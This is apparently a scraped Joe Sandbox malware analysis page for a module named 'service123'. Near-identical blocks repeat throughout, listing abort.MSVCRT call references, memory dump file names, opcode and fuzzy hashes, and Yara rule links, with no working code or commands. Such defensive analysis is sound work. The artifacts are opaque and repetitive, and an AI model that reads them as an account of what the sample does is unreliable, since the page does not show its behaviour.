APIs

abort.MSVCRT(?,?,?,?,00000001,?,6C21C5DB), ref: 6C2E6D03
abort.MSVCRT(?,?,?,?,00000001,?,6C21C5DB), ref: 6C2E6D08
abort.MSVCRT(?,?,?,?,00000001,?,6C21C5DB), ref: 6C2E6D0D
abort.MSVCRT(?,?,?,?,00000001,?,6C21C5DB), ref: 6C2E6D12
abort.MSVCRT(?,?,?,?,00000001,?,6C21C5DB), ref: 6C2E6D17
abort.MSVCRT(?,?,?,?,00000001,?,6C21C5DB), ref: 6C2E6D1C
abort.MSVCRT(?,?,?,?,00000001,?,6C21C5DB), ref: 6C2E6D21
abort.MSVCRT(?,?,?,?,00000001,?,6C21C5DB), ref: 6C2E6D26
abort.MSVCRT(?,?,?,?,00000001,?,6C21C5DB), ref: 6C2E6D2B
abort.MSVCRT(?,?,?,?,00000001,?,6C21C5DB), ref: 6C2E6D30
abort.MSVCRT(?,?,?,?,00000001,?,6C21C5DB), ref: 6C2E6D35
abort.MSVCRT(?,?,?,?,00000001,?,6C21C5DB), ref: 6C2E6D3A
abort.MSVCRT(?,?,?,?,00000001,?,6C21C5DB), ref: 6C2E6D3F
abort.MSVCRT(?,?,?,?,00000001,?,6C21C5DB), ref: 6C2E6D44
abort.MSVCRT(?,?,?,?,?,?,6C21E2F4,?,?,?,?,?,?,00000000,00000001,6C22008D), ref: 6C2E6D4C
abort.MSVCRT(?,?,?,?,?,?,6C21E2F4,?,?,?,?,?,?,00000000,00000001,6C22008D), ref: 6C2E6D51
abort.MSVCRT(?,?,?,?,?,?,6C21E2F4,?,?,?,?,?,?,00000000,00000001,6C22008D), ref: 6C2E6D56
abort.MSVCRT(?,?,?,?,?,?,6C21E2F4,?,?,?,?,?,?,00000000,00000001,6C22008D), ref: 6C2E6D5B
abort.MSVCRT(?,?,?,?,?,?,6C21E2F4,?,?,?,?,?,?,00000000,00000001,6C22008D), ref: 6C2E6D60
abort.MSVCRT(?,?,?,?,?,?,6C21E2F4,?,?,?,?,?,?,00000000,00000001,6C22008D), ref: 6C2E6D65
abort.MSVCRT(?,?,?,?,?,?,6C21E2F4,?,?,?,?,?,?,00000000,00000001,6C22008D), ref: 6C2E6D6A
abort.MSVCRT(?,?,?,?,?,?,6C21E2F4,?,?,?,?,?,?,00000000,00000001,6C22008D), ref: 6C2E6D6F
abort.MSVCRT(?,?,00000000,00000000,?,7591E010,6C22038F), ref: 6C2E6D74
abort.MSVCRT(?,?,00000000,00000000,?,7591E010,6C22038F), ref: 6C2E6D79
abort.MSVCRT(?,?,00000000,00000000,?,7591E010,6C22038F), ref: 6C2E6D7E

Memory Dump Source

Source File: 00000005.00000002.3291559833.000000006C211000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C210000, based on PE: true

Associated: 00000005.00000002.3291532769.000000006C210000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291669166.000000006C2ED000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291695138.000000006C2EF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291745132.000000006C338000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291770238.000000006C339000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291795013.000000006C33C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c210000_service123.jbxd

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: ed9e904bdc960e0274c863daabe7c540bf0483139fdd577b2139e1be0fdb7577
Instruction ID: 5f11c86f69c736f0948e0ec9f8ea4a9803d8f9bcbd5871420c248d7f5cdc8b03
Opcode Fuzzy Hash: ed9e904bdc960e0274c863daabe7c540bf0483139fdd577b2139e1be0fdb7577
Instruction Fuzzy Hash: 8DF027395DC12F8EC7002A1D4050CA1B3F3B66F72EBE91465EF817BF28C2219603C641

Function 6C21BEE7 Relevance: 37.6, APIs: 25, Instructions: 83COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3291559833.000000006C211000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C210000, based on PE: true

Associated: 00000005.00000002.3291532769.000000006C210000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291669166.000000006C2ED000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291695138.000000006C2EF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291745132.000000006C338000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291770238.000000006C339000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291795013.000000006C33C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c210000_service123.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7cac7bae27bfe1fa1b37dbd9d954c4855e625b73900370957da514a891a95aa8
Instruction ID: ecadd8e06454a1419a447f151722d020d3cd12b01898e84bbc1c58a604b1b8b7
Opcode Fuzzy Hash: 7cac7bae27bfe1fa1b37dbd9d954c4855e625b73900370957da514a891a95aa8
Instruction Fuzzy Hash: 73014EB2A0D65E07D3104E74C4D1351BAE25B83318F198669EE7517F9AC1389809D740

Function 6C21BC1B Relevance: 37.6, APIs: 25, Instructions: 55COMMON

Download Yara Rule

APIs

abort.MSVCRT(?,?,?,?,00000001,?,6C21C5DB), ref: 6C2E6D03
abort.MSVCRT(?,?,?,?,00000001,?,6C21C5DB), ref: 6C2E6D08
abort.MSVCRT(?,?,?,?,00000001,?,6C21C5DB), ref: 6C2E6D0D
abort.MSVCRT(?,?,?,?,00000001,?,6C21C5DB), ref: 6C2E6D12
abort.MSVCRT(?,?,?,?,00000001,?,6C21C5DB), ref: 6C2E6D17
abort.MSVCRT(?,?,?,?,00000001,?,6C21C5DB), ref: 6C2E6D1C
abort.MSVCRT(?,?,?,?,00000001,?,6C21C5DB), ref: 6C2E6D21
abort.MSVCRT(?,?,?,?,00000001,?,6C21C5DB), ref: 6C2E6D26
abort.MSVCRT(?,?,?,?,00000001,?,6C21C5DB), ref: 6C2E6D2B
abort.MSVCRT(?,?,?,?,00000001,?,6C21C5DB), ref: 6C2E6D30
abort.MSVCRT(?,?,?,?,00000001,?,6C21C5DB), ref: 6C2E6D35
abort.MSVCRT(?,?,?,?,00000001,?,6C21C5DB), ref: 6C2E6D3A
abort.MSVCRT(?,?,?,?,00000001,?,6C21C5DB), ref: 6C2E6D3F
abort.MSVCRT(?,?,?,?,00000001,?,6C21C5DB), ref: 6C2E6D44
abort.MSVCRT(?,?,?,?,?,?,6C21E2F4,?,?,?,?,?,?,00000000,00000001,6C22008D), ref: 6C2E6D4C
abort.MSVCRT(?,?,?,?,?,?,6C21E2F4,?,?,?,?,?,?,00000000,00000001,6C22008D), ref: 6C2E6D51
abort.MSVCRT(?,?,?,?,?,?,6C21E2F4,?,?,?,?,?,?,00000000,00000001,6C22008D), ref: 6C2E6D56
abort.MSVCRT(?,?,?,?,?,?,6C21E2F4,?,?,?,?,?,?,00000000,00000001,6C22008D), ref: 6C2E6D5B
abort.MSVCRT(?,?,?,?,?,?,6C21E2F4,?,?,?,?,?,?,00000000,00000001,6C22008D), ref: 6C2E6D60
abort.MSVCRT(?,?,?,?,?,?,6C21E2F4,?,?,?,?,?,?,00000000,00000001,6C22008D), ref: 6C2E6D65
abort.MSVCRT(?,?,?,?,?,?,6C21E2F4,?,?,?,?,?,?,00000000,00000001,6C22008D), ref: 6C2E6D6A
abort.MSVCRT(?,?,?,?,?,?,6C21E2F4,?,?,?,?,?,?,00000000,00000001,6C22008D), ref: 6C2E6D6F
abort.MSVCRT(?,?,00000000,00000000,?,7591E010,6C22038F), ref: 6C2E6D74
abort.MSVCRT(?,?,00000000,00000000,?,7591E010,6C22038F), ref: 6C2E6D79
abort.MSVCRT(?,?,00000000,00000000,?,7591E010,6C22038F), ref: 6C2E6D7E

Memory Dump Source

Source File: 00000005.00000002.3291559833.000000006C211000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C210000, based on PE: true

Associated: 00000005.00000002.3291532769.000000006C210000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291669166.000000006C2ED000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291695138.000000006C2EF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291745132.000000006C338000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291770238.000000006C339000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291795013.000000006C33C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c210000_service123.jbxd

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: 77b11931abd096bc3338c5977b156239d319a097d063f506d711946b206ded35
Instruction ID: 879299ef21b800fa212b1fe01a3dbc6aed9804ebc4f43885dc4b91d655c82581
Opcode Fuzzy Hash: 77b11931abd096bc3338c5977b156239d319a097d063f506d711946b206ded35
Instruction Fuzzy Hash: 3FE08C3664E31E4B86107998B4814AAB2A9DB5A359FA11C28DE08B3E10D351EA5886C2

Function 6C21BE00 Relevance: 37.5, APIs: 25, Instructions: 46COMMON

Download Yara Rule

APIs

abort.MSVCRT(?,?,?,?,00000001,?,6C21C5DB), ref: 6C2E6D03
abort.MSVCRT(?,?,?,?,00000001,?,6C21C5DB), ref: 6C2E6D08
abort.MSVCRT(?,?,?,?,00000001,?,6C21C5DB), ref: 6C2E6D0D
abort.MSVCRT(?,?,?,?,00000001,?,6C21C5DB), ref: 6C2E6D12
abort.MSVCRT(?,?,?,?,00000001,?,6C21C5DB), ref: 6C2E6D17
abort.MSVCRT(?,?,?,?,00000001,?,6C21C5DB), ref: 6C2E6D1C
abort.MSVCRT(?,?,?,?,00000001,?,6C21C5DB), ref: 6C2E6D21
abort.MSVCRT(?,?,?,?,00000001,?,6C21C5DB), ref: 6C2E6D26
abort.MSVCRT(?,?,?,?,00000001,?,6C21C5DB), ref: 6C2E6D2B
abort.MSVCRT(?,?,?,?,00000001,?,6C21C5DB), ref: 6C2E6D30
abort.MSVCRT(?,?,?,?,00000001,?,6C21C5DB), ref: 6C2E6D35
abort.MSVCRT(?,?,?,?,00000001,?,6C21C5DB), ref: 6C2E6D3A
abort.MSVCRT(?,?,?,?,00000001,?,6C21C5DB), ref: 6C2E6D3F
abort.MSVCRT(?,?,?,?,00000001,?,6C21C5DB), ref: 6C2E6D44
abort.MSVCRT(?,?,?,?,?,?,6C21E2F4,?,?,?,?,?,?,00000000,00000001,6C22008D), ref: 6C2E6D4C
abort.MSVCRT(?,?,?,?,?,?,6C21E2F4,?,?,?,?,?,?,00000000,00000001,6C22008D), ref: 6C2E6D51
abort.MSVCRT(?,?,?,?,?,?,6C21E2F4,?,?,?,?,?,?,00000000,00000001,6C22008D), ref: 6C2E6D56
abort.MSVCRT(?,?,?,?,?,?,6C21E2F4,?,?,?,?,?,?,00000000,00000001,6C22008D), ref: 6C2E6D5B
abort.MSVCRT(?,?,?,?,?,?,6C21E2F4,?,?,?,?,?,?,00000000,00000001,6C22008D), ref: 6C2E6D60
abort.MSVCRT(?,?,?,?,?,?,6C21E2F4,?,?,?,?,?,?,00000000,00000001,6C22008D), ref: 6C2E6D65
abort.MSVCRT(?,?,?,?,?,?,6C21E2F4,?,?,?,?,?,?,00000000,00000001,6C22008D), ref: 6C2E6D6A
abort.MSVCRT(?,?,?,?,?,?,6C21E2F4,?,?,?,?,?,?,00000000,00000001,6C22008D), ref: 6C2E6D6F
abort.MSVCRT(?,?,00000000,00000000,?,7591E010,6C22038F), ref: 6C2E6D74
abort.MSVCRT(?,?,00000000,00000000,?,7591E010,6C22038F), ref: 6C2E6D79
abort.MSVCRT(?,?,00000000,00000000,?,7591E010,6C22038F), ref: 6C2E6D7E

Memory Dump Source

Source File: 00000005.00000002.3291559833.000000006C211000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C210000, based on PE: true

Associated: 00000005.00000002.3291532769.000000006C210000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291669166.000000006C2ED000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291695138.000000006C2EF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291745132.000000006C338000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291770238.000000006C339000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291795013.000000006C33C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c210000_service123.jbxd

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: f1bdf92fe784dd716450a381fcbe393cc49dbea88f7ca8833756bdcf582f8442
Instruction ID: 7f1608f53d7dd8a20d14ac39fafd9b2ab43dad831767d3e0ce8b8be876f16001
Opcode Fuzzy Hash: f1bdf92fe784dd716450a381fcbe393cc49dbea88f7ca8833756bdcf582f8442
Instruction Fuzzy Hash: 66D0A73055D21F4BCB046F2C4099CADF3F66B5A30876A5C94CD05F3E15D631EB098A04

Function 6C21BE70 Relevance: 37.5, APIs: 25, Instructions: 46COMMON

Download Yara Rule

APIs

abort.MSVCRT(?,?,?,?,00000001,?,6C21C5DB), ref: 6C2E6D03
abort.MSVCRT(?,?,?,?,00000001,?,6C21C5DB), ref: 6C2E6D08
abort.MSVCRT(?,?,?,?,00000001,?,6C21C5DB), ref: 6C2E6D0D
abort.MSVCRT(?,?,?,?,00000001,?,6C21C5DB), ref: 6C2E6D12
abort.MSVCRT(?,?,?,?,00000001,?,6C21C5DB), ref: 6C2E6D17
abort.MSVCRT(?,?,?,?,00000001,?,6C21C5DB), ref: 6C2E6D1C
abort.MSVCRT(?,?,?,?,00000001,?,6C21C5DB), ref: 6C2E6D21
abort.MSVCRT(?,?,?,?,00000001,?,6C21C5DB), ref: 6C2E6D26
abort.MSVCRT(?,?,?,?,00000001,?,6C21C5DB), ref: 6C2E6D2B
abort.MSVCRT(?,?,?,?,00000001,?,6C21C5DB), ref: 6C2E6D30
abort.MSVCRT(?,?,?,?,00000001,?,6C21C5DB), ref: 6C2E6D35
abort.MSVCRT(?,?,?,?,00000001,?,6C21C5DB), ref: 6C2E6D3A
abort.MSVCRT(?,?,?,?,00000001,?,6C21C5DB), ref: 6C2E6D3F
abort.MSVCRT(?,?,?,?,00000001,?,6C21C5DB), ref: 6C2E6D44
abort.MSVCRT(?,?,?,?,?,?,6C21E2F4,?,?,?,?,?,?,00000000,00000001,6C22008D), ref: 6C2E6D4C
abort.MSVCRT(?,?,?,?,?,?,6C21E2F4,?,?,?,?,?,?,00000000,00000001,6C22008D), ref: 6C2E6D51
abort.MSVCRT(?,?,?,?,?,?,6C21E2F4,?,?,?,?,?,?,00000000,00000001,6C22008D), ref: 6C2E6D56
abort.MSVCRT(?,?,?,?,?,?,6C21E2F4,?,?,?,?,?,?,00000000,00000001,6C22008D), ref: 6C2E6D5B
abort.MSVCRT(?,?,?,?,?,?,6C21E2F4,?,?,?,?,?,?,00000000,00000001,6C22008D), ref: 6C2E6D60
abort.MSVCRT(?,?,?,?,?,?,6C21E2F4,?,?,?,?,?,?,00000000,00000001,6C22008D), ref: 6C2E6D65
abort.MSVCRT(?,?,?,?,?,?,6C21E2F4,?,?,?,?,?,?,00000000,00000001,6C22008D), ref: 6C2E6D6A
abort.MSVCRT(?,?,?,?,?,?,6C21E2F4,?,?,?,?,?,?,00000000,00000001,6C22008D), ref: 6C2E6D6F
abort.MSVCRT(?,?,00000000,00000000,?,7591E010,6C22038F), ref: 6C2E6D74
abort.MSVCRT(?,?,00000000,00000000,?,7591E010,6C22038F), ref: 6C2E6D79
abort.MSVCRT(?,?,00000000,00000000,?,7591E010,6C22038F), ref: 6C2E6D7E

Memory Dump Source

Source File: 00000005.00000002.3291559833.000000006C211000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C210000, based on PE: true

Associated: 00000005.00000002.3291532769.000000006C210000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291669166.000000006C2ED000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291695138.000000006C2EF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291745132.000000006C338000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291770238.000000006C339000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291795013.000000006C33C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c210000_service123.jbxd

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: 2752d643918e1e1032e991af4b8656a5a6dc123bbfd1704150af43cc30d29a6a
Instruction ID: 1a8f3f641c0809ad39a7ec8e0a06d6b1b9778d5f14bd92fff754a41b98f7994d
Opcode Fuzzy Hash: 2752d643918e1e1032e991af4b8656a5a6dc123bbfd1704150af43cc30d29a6a
Instruction Fuzzy Hash: D7D0173418970D8F8300FF08D1948A9F7F5AB4E305B419D69CD08A7F34D635D508CE01

Function 6C21BDC7 Relevance: 37.5, APIs: 25, Instructions: 44COMMON

Download Yara Rule

APIs

abort.MSVCRT(?,?,?,?,00000001,?,6C21C5DB), ref: 6C2E6D03
abort.MSVCRT(?,?,?,?,00000001,?,6C21C5DB), ref: 6C2E6D08
abort.MSVCRT(?,?,?,?,00000001,?,6C21C5DB), ref: 6C2E6D0D
abort.MSVCRT(?,?,?,?,00000001,?,6C21C5DB), ref: 6C2E6D12
abort.MSVCRT(?,?,?,?,00000001,?,6C21C5DB), ref: 6C2E6D17
abort.MSVCRT(?,?,?,?,00000001,?,6C21C5DB), ref: 6C2E6D1C
abort.MSVCRT(?,?,?,?,00000001,?,6C21C5DB), ref: 6C2E6D21
abort.MSVCRT(?,?,?,?,00000001,?,6C21C5DB), ref: 6C2E6D26
abort.MSVCRT(?,?,?,?,00000001,?,6C21C5DB), ref: 6C2E6D2B
abort.MSVCRT(?,?,?,?,00000001,?,6C21C5DB), ref: 6C2E6D30
abort.MSVCRT(?,?,?,?,00000001,?,6C21C5DB), ref: 6C2E6D35
abort.MSVCRT(?,?,?,?,00000001,?,6C21C5DB), ref: 6C2E6D3A
abort.MSVCRT(?,?,?,?,00000001,?,6C21C5DB), ref: 6C2E6D3F
abort.MSVCRT(?,?,?,?,00000001,?,6C21C5DB), ref: 6C2E6D44
abort.MSVCRT(?,?,?,?,?,?,6C21E2F4,?,?,?,?,?,?,00000000,00000001,6C22008D), ref: 6C2E6D4C
abort.MSVCRT(?,?,?,?,?,?,6C21E2F4,?,?,?,?,?,?,00000000,00000001,6C22008D), ref: 6C2E6D51
abort.MSVCRT(?,?,?,?,?,?,6C21E2F4,?,?,?,?,?,?,00000000,00000001,6C22008D), ref: 6C2E6D56
abort.MSVCRT(?,?,?,?,?,?,6C21E2F4,?,?,?,?,?,?,00000000,00000001,6C22008D), ref: 6C2E6D5B
abort.MSVCRT(?,?,?,?,?,?,6C21E2F4,?,?,?,?,?,?,00000000,00000001,6C22008D), ref: 6C2E6D60
abort.MSVCRT(?,?,?,?,?,?,6C21E2F4,?,?,?,?,?,?,00000000,00000001,6C22008D), ref: 6C2E6D65
abort.MSVCRT(?,?,?,?,?,?,6C21E2F4,?,?,?,?,?,?,00000000,00000001,6C22008D), ref: 6C2E6D6A
abort.MSVCRT(?,?,?,?,?,?,6C21E2F4,?,?,?,?,?,?,00000000,00000001,6C22008D), ref: 6C2E6D6F
abort.MSVCRT(?,?,00000000,00000000,?,7591E010,6C22038F), ref: 6C2E6D74
abort.MSVCRT(?,?,00000000,00000000,?,7591E010,6C22038F), ref: 6C2E6D79
abort.MSVCRT(?,?,00000000,00000000,?,7591E010,6C22038F), ref: 6C2E6D7E

Memory Dump Source

Source File: 00000005.00000002.3291559833.000000006C211000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C210000, based on PE: true

Associated: 00000005.00000002.3291532769.000000006C210000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291669166.000000006C2ED000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291695138.000000006C2EF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291745132.000000006C338000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291770238.000000006C339000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291795013.000000006C33C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c210000_service123.jbxd

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: 2018c9856225a1e0aff8a6428b538321e9f063033382905ac13f326accea8504
Instruction ID: 8217102505f9f73cb27033b81b1fd6373ed2f7fccf989b3b7dfd64be7e5539b8
Opcode Fuzzy Hash: 2018c9856225a1e0aff8a6428b538321e9f063033382905ac13f326accea8504
Instruction Fuzzy Hash: 12C0122599D31D4BC2103D981051766F2E59B1B205F622C188E4533F10CB75E8048945

Function 6C21BE98 Relevance: 37.5, APIs: 25, Instructions: 43COMMON

Download Yara Rule

APIs

abort.MSVCRT(?,?,?,?,00000001,?,6C21C5DB), ref: 6C2E6D03
abort.MSVCRT(?,?,?,?,00000001,?,6C21C5DB), ref: 6C2E6D08
abort.MSVCRT(?,?,?,?,00000001,?,6C21C5DB), ref: 6C2E6D0D
abort.MSVCRT(?,?,?,?,00000001,?,6C21C5DB), ref: 6C2E6D12
abort.MSVCRT(?,?,?,?,00000001,?,6C21C5DB), ref: 6C2E6D17
abort.MSVCRT(?,?,?,?,00000001,?,6C21C5DB), ref: 6C2E6D1C
abort.MSVCRT(?,?,?,?,00000001,?,6C21C5DB), ref: 6C2E6D21
abort.MSVCRT(?,?,?,?,00000001,?,6C21C5DB), ref: 6C2E6D26
abort.MSVCRT(?,?,?,?,00000001,?,6C21C5DB), ref: 6C2E6D2B
abort.MSVCRT(?,?,?,?,00000001,?,6C21C5DB), ref: 6C2E6D30
abort.MSVCRT(?,?,?,?,00000001,?,6C21C5DB), ref: 6C2E6D35
abort.MSVCRT(?,?,?,?,00000001,?,6C21C5DB), ref: 6C2E6D3A
abort.MSVCRT(?,?,?,?,00000001,?,6C21C5DB), ref: 6C2E6D3F
abort.MSVCRT(?,?,?,?,00000001,?,6C21C5DB), ref: 6C2E6D44
abort.MSVCRT(?,?,?,?,?,?,6C21E2F4,?,?,?,?,?,?,00000000,00000001,6C22008D), ref: 6C2E6D4C
abort.MSVCRT(?,?,?,?,?,?,6C21E2F4,?,?,?,?,?,?,00000000,00000001,6C22008D), ref: 6C2E6D51
abort.MSVCRT(?,?,?,?,?,?,6C21E2F4,?,?,?,?,?,?,00000000,00000001,6C22008D), ref: 6C2E6D56
abort.MSVCRT(?,?,?,?,?,?,6C21E2F4,?,?,?,?,?,?,00000000,00000001,6C22008D), ref: 6C2E6D5B
abort.MSVCRT(?,?,?,?,?,?,6C21E2F4,?,?,?,?,?,?,00000000,00000001,6C22008D), ref: 6C2E6D60
abort.MSVCRT(?,?,?,?,?,?,6C21E2F4,?,?,?,?,?,?,00000000,00000001,6C22008D), ref: 6C2E6D65
abort.MSVCRT(?,?,?,?,?,?,6C21E2F4,?,?,?,?,?,?,00000000,00000001,6C22008D), ref: 6C2E6D6A
abort.MSVCRT(?,?,?,?,?,?,6C21E2F4,?,?,?,?,?,?,00000000,00000001,6C22008D), ref: 6C2E6D6F
abort.MSVCRT(?,?,00000000,00000000,?,7591E010,6C22038F), ref: 6C2E6D74
abort.MSVCRT(?,?,00000000,00000000,?,7591E010,6C22038F), ref: 6C2E6D79
abort.MSVCRT(?,?,00000000,00000000,?,7591E010,6C22038F), ref: 6C2E6D7E

Memory Dump Source

Source File: 00000005.00000002.3291559833.000000006C211000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C210000, based on PE: true

Associated: 00000005.00000002.3291532769.000000006C210000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291669166.000000006C2ED000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291695138.000000006C2EF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291745132.000000006C338000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291770238.000000006C339000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291795013.000000006C33C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c210000_service123.jbxd

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: bc52ccfba1c464a848b42941d0ab8aaff6de37609b708ea6479571ad4f8441ac
Instruction ID: fc23de8c82b949afbea66956808d1d5671f0c01a7c2e6c89755947909528de18
Opcode Fuzzy Hash: bc52ccfba1c464a848b42941d0ab8aaff6de37609b708ea6479571ad4f8441ac
Instruction Fuzzy Hash: B8C0123965E31E8B8340BE8490918A9B2B4AB6F304F412C54DE0173F14C774E508C941

Function 6C21BDE8 Relevance: 37.5, APIs: 25, Instructions: 42COMMON

Download Yara Rule

APIs

abort.MSVCRT(?,?,?,?,00000001,?,6C21C5DB), ref: 6C2E6D03
abort.MSVCRT(?,?,?,?,00000001,?,6C21C5DB), ref: 6C2E6D08
abort.MSVCRT(?,?,?,?,00000001,?,6C21C5DB), ref: 6C2E6D0D
abort.MSVCRT(?,?,?,?,00000001,?,6C21C5DB), ref: 6C2E6D12
abort.MSVCRT(?,?,?,?,00000001,?,6C21C5DB), ref: 6C2E6D17
abort.MSVCRT(?,?,?,?,00000001,?,6C21C5DB), ref: 6C2E6D1C
abort.MSVCRT(?,?,?,?,00000001,?,6C21C5DB), ref: 6C2E6D21
abort.MSVCRT(?,?,?,?,00000001,?,6C21C5DB), ref: 6C2E6D26
abort.MSVCRT(?,?,?,?,00000001,?,6C21C5DB), ref: 6C2E6D2B
abort.MSVCRT(?,?,?,?,00000001,?,6C21C5DB), ref: 6C2E6D30
abort.MSVCRT(?,?,?,?,00000001,?,6C21C5DB), ref: 6C2E6D35
abort.MSVCRT(?,?,?,?,00000001,?,6C21C5DB), ref: 6C2E6D3A
abort.MSVCRT(?,?,?,?,00000001,?,6C21C5DB), ref: 6C2E6D3F
abort.MSVCRT(?,?,?,?,00000001,?,6C21C5DB), ref: 6C2E6D44
abort.MSVCRT(?,?,?,?,?,?,6C21E2F4,?,?,?,?,?,?,00000000,00000001,6C22008D), ref: 6C2E6D4C
abort.MSVCRT(?,?,?,?,?,?,6C21E2F4,?,?,?,?,?,?,00000000,00000001,6C22008D), ref: 6C2E6D51
abort.MSVCRT(?,?,?,?,?,?,6C21E2F4,?,?,?,?,?,?,00000000,00000001,6C22008D), ref: 6C2E6D56
abort.MSVCRT(?,?,?,?,?,?,6C21E2F4,?,?,?,?,?,?,00000000,00000001,6C22008D), ref: 6C2E6D5B
abort.MSVCRT(?,?,?,?,?,?,6C21E2F4,?,?,?,?,?,?,00000000,00000001,6C22008D), ref: 6C2E6D60
abort.MSVCRT(?,?,?,?,?,?,6C21E2F4,?,?,?,?,?,?,00000000,00000001,6C22008D), ref: 6C2E6D65
abort.MSVCRT(?,?,?,?,?,?,6C21E2F4,?,?,?,?,?,?,00000000,00000001,6C22008D), ref: 6C2E6D6A
abort.MSVCRT(?,?,?,?,?,?,6C21E2F4,?,?,?,?,?,?,00000000,00000001,6C22008D), ref: 6C2E6D6F
abort.MSVCRT(?,?,00000000,00000000,?,7591E010,6C22038F), ref: 6C2E6D74
abort.MSVCRT(?,?,00000000,00000000,?,7591E010,6C22038F), ref: 6C2E6D79
abort.MSVCRT(?,?,00000000,00000000,?,7591E010,6C22038F), ref: 6C2E6D7E

Memory Dump Source

Source File: 00000005.00000002.3291559833.000000006C211000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C210000, based on PE: true

Associated: 00000005.00000002.3291532769.000000006C210000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291669166.000000006C2ED000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291695138.000000006C2EF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291745132.000000006C338000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291770238.000000006C339000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291795013.000000006C33C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c210000_service123.jbxd

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: 69f2f5bcc04e92503fe01ced6f102d5792e48c4d85d4df18c058018d50acc486
Instruction ID: e86abdeb5556b8247641bd2ee7fb022f6fc69f295c49549237f4c66f4fb44df2
Opcode Fuzzy Hash: 69f2f5bcc04e92503fe01ced6f102d5792e48c4d85d4df18c058018d50acc486
Instruction Fuzzy Hash: 1CC08C309DD31D4742403D081092878F2E5471B224B862D14CE0133F10CA2AD8488844

Function 6C21C150 Relevance: 36.3, APIs: 24, Instructions: 284COMMON

Download Yara Rule

Memory Dump Source

